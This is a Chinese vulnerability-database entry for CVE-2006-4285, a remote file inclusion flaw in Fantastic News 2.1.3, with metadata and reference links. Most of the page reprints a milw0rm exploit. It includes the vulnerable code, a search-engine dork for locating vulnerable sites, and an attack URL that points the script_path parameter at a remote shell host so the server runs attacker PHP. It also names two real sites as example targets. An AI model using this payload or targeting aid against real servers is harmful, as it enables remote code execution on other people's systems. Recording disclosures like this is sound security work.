Fantastic Scripts Fantastic News 'news.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110856 漏洞类型 代码注入
发布时间 2006-08-19 更新时间 2007-08-08
CVE编号 CVE-2006-4285 CNNVD-ID CNNVD-200608-361
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2221
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-361
|漏洞详情
FantasticNews2.1.3及早期版本的news.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助CONFIG[script_path]参数中的URL执行任意PHP代码。
|漏洞EXP
#==============================================================================================
#Fantastic News <= v2.1.3 (CONFIG[script_path]) Remote File Inclusion Exploit
#===============================================================================================
#                                                                            
#Critical Level : Dangerous                                                  
#                                                                            
#Venedor site : http://fscripts.com/              
#                                                                              
#Version : v2.1.2 & v2.1.3                                                  
#                                                                
#================================================================================================
#
#Dork : "Powered by Fantastic News v2.1.2" or "Powered by Fantastic News v2.1.3"
#
#================================================================================================
#
#Bug in : news.php
#
#Vlu Code :
#--------------------------------
#  require_once($CONFIG['script_path']."config.php");
#  require_once($CONFIG['script_path']."functions/functions.php");
#  require_once($CONFIG['script_path']."functions/mysql.php");
#  require_once($CONFIG['script_path']."functions/template.php");
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/news.php?CONFIG[script_path]=http://SHELLURL.COM?
#
#Example :
#   http://fscripts.com/ ====> vendor site =)) hahahahaaaaaa ====>    2.1.3
#   http://lnx.evanescencewebsite.com/PressArchive  =====>    2.1.2
#
#
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)
==================================================================================================

# milw0rm.com [2006-08-19]
|参考资料

来源:BID
名称:19613
链接:http://www.securityfocus.com/bid/19613
来源:SECUNIA
名称:21571
链接:http://secunia.com/advisories/21571
来源:MISC
链接:http://fscripts.com/index.php
来源:XF
名称:fantasticnews-news-file-include(28469)
链接:http://xforce.iss.net/xforce/xfdb/28469
来源:BUGTRAQ
名称:20070121FantasticNews<=-(news.php)RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/457680/100/0/threaded
来源:MILW0RM
名称:2221
链接:http://www.milw0rm.com/exploits/2221
来源:VUPEN
名称:ADV-2006-3336
链接:http://www.frsirt.com/english/advisories/2006/3336
来源:MILW0RM
名称:2221
链接:http://milw0rm.com/exploits/2221